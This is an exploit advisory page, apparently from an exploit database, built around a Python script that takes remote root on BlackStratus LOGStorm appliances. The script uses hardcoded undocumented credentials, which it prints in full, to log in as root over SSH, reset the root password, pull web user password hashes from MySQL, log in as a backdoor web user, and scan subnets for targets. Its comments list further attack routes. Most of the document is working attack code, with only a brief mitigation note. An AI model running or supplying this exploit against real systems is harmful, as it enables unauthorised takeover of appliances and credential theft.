BlackStratus LOGStorm / Remote Root

Credit: Jeremy Brown
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 5.5/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

#!/usr/bin/python # # # BlackStratus LOGStorm Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # Dec 2016 # # -Synopsis- # # "Better Security and Compliance for Any Size Business" # # BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among # other things, to assume complete control over the virtual appliance with root privileges. This is # possible due to multiple network servers listening for network connections by default, allowing # authorization with undocumented credentials supported by appliance's OS, web interface and sql server. # # -Tested- # # v4.5.1.35 # v4.5.1.96 # # -Usage- # # Dependencies: pip install paramiko MySQL-python # # There are (5) actions provided in this script: root, reset, sql, web and scan. # # [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command # [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password # [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials # [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account # [scan] scans a given <host>/24 for potentially vulnerable appliances # # *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only. # # Note: this exploit is not and cannot be weaponized simply because exploits are not weapons. # # -Fixes- # # BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But # customers may (now) root the appliance themselves to change the passwords, disable root login, firewall # network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another # product altogether because this appliance, as of today, simply adds too much attack surface to the network. # # -Bonuses- # # 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks # # 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files # 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running # in debug mode and probably exploitable with (also netcat with -e is installed by default!) # # 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd # import sys import socket import time from paramiko import ssh_exception import paramiko import MySQLdb import httplib import urllib SSH_BANNER = "_/_/_/_/" SSH_PORT = 22 MYSQL_PORT = 3306 MYSQL_DB = "htr" MYSQL_CMD = "select USER_ID,hex(MD5_PASSWORD) from users;" WEB_URL = "/tvs/layout/j_security_check" ROOT_CREDS = ["root", "3!acK5tratu5"] HTINIT_CREDS = ["htinit", "htinit"] MYSQL_CREDS = ["htr", "htr_pwd"] WEB_CREDS = ["webserviceuser", "donotChangeOnInstall"] def main(): if(len(sys.argv) < 2): print("Usage: %s <action> <host>" % sys.argv[0]) print("Eg. %s root\n" % sys.argv[0]) print("Actions: root reset sql web scan") return action = str(sys.argv[1]) host = str(sys.argv[2]) if("scan" not in action): try: socket.inet_aton(host) except socket.error: print("[-] %s doesn't look like a valid ip address" % host) return ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # # ssh login as root and execute 'id' # if(action == "root"): try: ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT) except ssh_exception.AuthenticationException: print("\n[-] Action failed, could not login with root credentials\n") return print("[+] Success!") ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("id") print(ssh_stdout.readline()) return # # ssh login as htinit and reset root password to the default # elif(action == "reset"): print("[~] Resetting password on %s..." % host) try: ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT) except ssh_exception.AuthenticationException: print("\n[-] Reset failed, could not login with htinit credentials\n") return ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("") ssh_stdin.write("4" + "\n") time.sleep(2) ssh_stdin.write(ROOT_CREDS[1] + "\n") time.sleep(2) ssh_stdin.write("^C" + "\n") time.sleep(1) print("[+] Appliance root password should now be reset") return # # sql login as htr and select user/hash columns from the web users table # elif(action == "sql"): print("[~] Asking %s for it's web users and their password hashes..." % host) try: db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3) except MySQLdb.Error as error: print("\n[-] Failed to connect to %s:\n%s\n" % (host, error)) return cursor = db.cursor() cursor.execute(MYSQL_CMD) data = cursor.fetchall() print("[+] Got creds!\n") for row in data: print("USER_ID: %s\nMD5_PASSWORD: %s\n" % (row[0], row[1])) db.close() return # # http login as webserviceuser and gain presumably admin privileges # elif(action == "web"): print("[~] Attempting to login as backdoor web user at %s..." % host) try: client = httplib.HTTPSConnection(host) except: print("[-] Couldn't establish SSL connection to %s" % host) return params = urllib.urlencode({"j_username" : WEB_CREDS[0], "j_password" : WEB_CREDS[1]}) headers = {"Host" : host, "Content-Type" : "application/x-www-form-urlencoded", "Content-Length" : "57"} client.request("POST", WEB_URL, params, headers) response = client.getresponse() if(response.status == 408): print("[+] Success!") else: print("[-] Service returned %d %s, which is actually not our criteria for success" % (response.status, response.reason)) return # # check the ssh network banner to identify appliances within range of <host>/24 # elif(action == "scan"): count = 0 print("[~] Scanning %s for LOGStorm appliances..." % sys.argv[2]) for x in range(1,255): banner = None # # -> 10.1.1.[x] # host = str(sys.argv[2]).split('/')[0][:-1] + str(x) try: ssh.connect(host, SSH_PORT, "user-that-doesnt-exist", "pass-that-doesnt-work", timeout=2) except ssh_exception.NoValidConnectionsError: pass except socket.timeout: pass except ssh_exception.AuthenticationException as error: banner = ssh._transport.get_banner() if banner and SSH_BANNER in banner: print("[!] %s\n" % host) count+=1 print("[+] Found %d appliance(s)"% count) return if __name__ == "__main__": main()

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